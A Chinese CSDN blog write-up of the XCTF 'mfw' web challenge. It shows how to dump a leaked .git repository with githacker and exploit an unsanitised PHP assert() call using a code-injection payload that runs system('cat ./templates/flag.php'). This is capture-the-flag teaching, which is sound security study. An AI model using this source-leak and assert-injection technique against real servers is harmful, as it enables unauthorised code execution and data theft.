攻防世界-web-mfw

最新推荐文章于 2024-05-26 12:46:39 发布
最新推荐文章于 2024-05-26 12:46:39 发布
阅读量599 收藏 4
点赞数
分类专栏: 安全 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuh2333/article/details/131354837
版权

题目描述:如图,只有这样的三个页面

home页面:

about页面:

contact页面:

burp抓包可以看到返回的html中刚好对应了三个页面,以及注释掉的flag

尝试将page设置成flag,但是并没有什么反应。

1. 思路分析

这道题只有一个page参数,page参数能做文章的地方不多,要么是sql注入,要么是命令注入。

然后我们注意到 about页面中描述了网站使用了git,我们推测这里可能有源码泄露

访问http://61.147.171.105:55174/.git/,果然可以看到源码

 既然可以看到源码,那就能明确究竟是sql注入还是命令注入了。

2. 解题过程

2.1 使用githacker工具将源码下载下来

pip install githacker
mkdir mfw
githacker --url http://61.147.171.105:49975/ --output-folder mfw/

2.2 我们看下这几个文件的内容

先看下flag.php,里面什么都没有,只能说是意料之中

然后看下代码文件index.php

这里我们发现,我们传入的page参数拼接到$file变量中,然后$file又被传入到assert函数去执行

assert函数有一个特点,那就是如果传入的参数为字符串,那么该字符串会被当做php代码去执行,而且我们会发现程序中并没有对传入的参数进行任何限制。

到了这一步,基本上就明确这里存在命令注入了,然后就是构造POC了

 构造POC:page=') or system('cat ./templates/flag.php');//

这时, assert函数就变成了 :

assert("strpos('templates/') or system('cat ./templates/flag.php');//.php', '..') === false") or die("Detected hacking attempt!");

后面的代码被注释掉了,真正执行的是assert("strpos('templates/') or system('cat ./templates/flag.php');

最终,获取到flag为:cyberpeace{9dd94f2529283b4941760f6cb36a8bc0}

 总结:这道题涉及到两个知识点,一个是git源码泄露,一个是命令注入。整体来说比较综合,从思路上来说,只有一个参数的情况下,大概率是注入类型的漏洞,但是如何利用,需要获取到源码进行确认,因此,这里通过githacker获取到源码是非常关键的一个步骤。获取到源码后,利用assert函数进行注入也就不难了

wuh2333
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1347
学习pwn开始,慢慢来不要急
攻防世界——web新手和引导模式(全解)
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界-难度1-Misc总结
Welcome To Myon'Blog !
03-05 5087
攻防世界-难度1-Misc总结 ; 主要针对Misc入门、图片隐写; kali linux、Stegsolve.jar、010Editor、WinHex、QR Research、Ziperello、ARCHPR、RX-SSTV、IDLE、Bandizip、7zFM、Firefox、SilentEye、DeepSound、PS、Wireshark;binwalk、foremost、zsteg、strings、grep、stegpy、file、checksec、pngcheck、convert、montage
攻防世界-mfw
最新发布
weixin_64659753的博客
05-26 299
攻防世界-mfw
攻防世界-unseping
m0_49025459的博客
12-17 2827
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
攻防世界mfw--详细笔记
jkhdjkasd的博客
07-26 1124
攻防世界mfw--详细笔记
mfw-bootstrap
04-02
"mfw-bootstrap"是一个基于HTML的引导样板项目,它的核心目标是为开发者提供一个快速启动Web页面设计和开发的基础框架。Bootstrap是由Twitter开发并开源的一个流行的前端开发框架,它简化了网页布局、响应式设计以及...
peach-pit-mfwMFW第一天示例
02-25
HTML文件通常以`.html`或`.htm`为扩展名,因此在"peach-pit-mfw-main"这个压缩包中,可能包含一个或多个这样的文件,它们可能是已经编写好的HTML示例,供学习者参考和分析。通过查看和编辑这些文件,你可以了解到...
Python库 | mfw-template-0.1b2.tar.gz
05-17
资源分类:Python库 所属语言:Python 资源全名:mfw-template-0.1b2.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
mfw-portfolio:移动友好投资组合决赛'20
03-31
"mfw-portfolio:移动友好投资组合决赛'20"是一个项目,主要关注于创建一个适应移动设备的投资组合页面,这在当前移动优先的互联网环境中至关重要。该项目可能旨在展示参赛者在网页设计和开发,尤其是CSS(层叠样式表...
event-landing-page
03-13
在这个项目中,我们看到一个名为“mfw-bootstrap-template”的文件,它是一个基于Bootstrap框架的模板,用于构建这个事件登陆页面。 Bootstrap是一款流行的开源前端开发框架,它提供了丰富的组件、预设样式和响应式...
【愚公系列】2023年06月 攻防世界-Web(blgdel)
时光隧道
06-20 6985
PHP文件上传漏洞是指攻击者能够通过上传恶意文件来执行恶意代码,从而控制服务器或窃取敏感数据的安全漏洞。一般来说,攻击者会将一些包含恶意代码的文件伪装成图片、压缩包等常见格式的文件,骗取用户上传,进而向网站提交指定的文件名,替换掉原有的文件,造成恶意代码的执行,危害网站安全。攻击者可以通过以下方式来利用PHP文件上传漏洞:上传Webshell:攻击者可以上传包含恶意代码的Webshell,通过Webshell控制服务器,获取敏感信息,或者利用Webshell进行后续攻击。
全!CTF靶场、渗透实战靶场总结 (适合收藏)
热门推荐
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
攻防世界】十八 --- mfw --- git源码泄露
qq_43168364的博客
12-29 440
题目 ---- mfw 一、writeup 主页中抓包,提示flag在:?page=flag 中 这里考的不是文件包含,在这个页面提示使用了git,考的是git源代码泄露,访问:220.249.52.134:40286/.git/ 也可以使用dirsearch,命令:python3 dirsearch.py -u http://220.249.52.134:40286/ -e php 可访问的目录中没有有用的资源,使用GitHack.py 脚本导出所有的备份文件,执行:python2 GitHack.
攻防世界 WEB mfw
qq_41696858的博客
08-20 189
这题考的是两个点:Git泄露和assert函数执行代码 先说Git泄露,通过About发现该网站使用了Git,查看/.git目录发现确实存在泄露情况 那么下载GitHacker工具查看源码 pip3 install GitHacker githacker --url http://111.200.241.244:60711/ --folder result1 //这里的folder表示的是输出文件夹 然后查看源码,在index.php里面发现assert函数 $file = “templates/” . $
攻防世界-pdf
m0_62094846的博客
10-25 372
下载文件后,发现是个pdf文件,没有任何作用,先用word打开,将图片提取出来 根据题目的提示 猜测可能图的下面有所隐藏 改变其长宽,但是仍然没有什么变化 那么题目所说的下面,只可能是说明图片覆盖了某些信息,但是通过word又什么都没有发现,重新再看pdf, 可以看到这里有文字,复制粘贴就可以得到flag: flag{security_through_obscurity} ...
功防世界-Misc(部分)
Sea_Sand息禅
04-15 3127
1、Cephalopod 数据包打开,分组字节流查询个flag,发现出现了flag.png的字样,但是并没有这个图片文件,往下翻,图片应该在长度较大的流中,追踪tcp流在tcp.stream eq 2处找到图片文件: 把图片提取出来拿到flag: 2、Test-flag-please-ignore 文件内容拿去16进制解码得flag。 3、János-the-Ripper 解压出来...
攻防世界-Cat
m0_47571887的博客
11-19 1783
打开题目,是一个查询域名的输入框。 输入了www.baidu.com没有反应,输入127.0.0.1发现执行成功,进行命令拼接, 提示了错误url,应该是被过滤掉了,用字典测试一下,发现只有@没有被过滤,考虑到输入的字符都会被url编码后传入,我们试一下宽字节%df 发现报错,我们保存为html查看一下 从这里可以知道后端含有Django框架,我们也知道没有过滤掉@,并且当 curlopt_safe_upload 为 true 时,所以在请求前面加上@的话phpcurl组件...
攻防世界-Mobile-基础android (Misc经验解法)
qq_51975055的博客
08-07 2268
攻防世界-Mobile-基础android (Misc经验解法)
度为2的有序树就是二叉树
09-01
- *3* [第六章 树和二叉树习题1](https://download.csdn.net/download/MFW333/87596042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值